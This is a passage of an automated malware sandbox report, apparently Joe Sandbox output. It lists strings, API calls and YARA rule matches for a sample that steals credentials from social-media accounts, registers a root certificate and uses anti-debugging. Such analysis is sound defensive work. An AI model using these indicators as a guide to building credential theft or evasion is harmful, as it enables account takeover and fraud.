Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp, ecvB803.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262299790.0000000003F62000.00000004.00000001.sdmp, ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/7
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/calend
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreU
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreh
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangoutsrx
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetingsrx
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraM
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040AE4D OpenClipboard,11_2_0040AE4D

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F720

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: fnhcdXEfus.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 63C4F3D9EA0CC861.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,0_2_10019D40
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019F00
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019F50
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019FA0
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040C516 NtQuerySystemInformation,11_2_0040C516
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,11_2_0040C6FB
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001D560: wsprintfW,CreateFileW,_memset,DeviceIoControl,FindCloseChangeNotification,0_2_1001D560
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_0045895B
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004456300_2_00445630
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0045015C0_2_0045015C
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004506CC0_2_004506CC
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00450C3C0_2_00450C3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004091400_2_00409140
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004095800_2_00409580
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004456120_2_00445612
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004456200_2_00445620
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004456C30_2_004456C3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004098700_2_00409870
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00461A300_2_00461A30
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00451A3C0_2_00451A3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445BD30_2_00445BD3
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044E1E60_2_0044E1E6
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004521B80_2_004521B8
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004227510_2_00422751
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00406A400_2_00406A40
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0043ACD10_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044AD9A0_2_0044AD9A
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004071620_2_00407162
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004073B50_2_004073B5
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0044B6B40_2_0044B6B4
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100071F00_2_100071F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100092570_2_10009257
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000B3B00_2_1000B3B0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000B8830_2_1000B883
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100099E00_2_100099E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000BC570_2_1000BC57
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000FF710_2_1000FF71
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000C0630_2_1000C063
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100060F00_2_100060F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100083400_2_10008340
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000E3800_2_1000E380
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100083F00_2_100083F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000C4830_2_1000C483
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100105900_2_10010590
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_100169BD0_2_100169BD
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10010AED0_2_10010AED
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1000ABA00_2_1000ABA0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001EBD00_2_1001EBD0
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001EDDB0_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000C0633_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000B8833_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100060F03_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100169BD3_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100099E03_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100071F03_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100092573_2_10009257
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10010AED3_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100083403_2_10008340
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000E3803_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000ABA03_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000B3B03_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001EBD03_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100083F03_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000BC573_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000C4833_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_100105903_2_10010590
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001EDDB3_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000FF713_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1612045890161.exeCode function: 11_2_00404BE411_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B963B30_2_002B963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B6A1E30_2_002B6A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002BA0C330_2_002BA0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002BB51C30_2_002BB51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B9B7F30_2_002B9B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002BA7BB30_2_002BA7BB
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 0044280F appears 302 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 004025E0 appears 342 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 0040C6E1 appears 99 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00411D8B appears 39 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00442842 appears 295 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00442878 appears 83 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00441423 appears 42 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 004115CB appears 41 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00401070 appears 36 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: String function: 00441570 appears 54 times
Source: fnhcdXEfus.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 63C4F3D9EA0CC861.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fnhcdXEfus.exe, 00000000.00000002.246163908.00000000024AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246034972.0000000000BA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246020495.0000000000B80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246024794.0000000000B90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exeBinary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: fnhcdXEfus.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.2810000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
